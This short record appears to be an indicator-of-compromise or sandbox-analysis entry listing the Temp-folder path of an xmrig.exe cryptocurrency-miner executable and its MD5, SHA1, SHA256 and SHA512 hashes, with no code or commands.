C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6
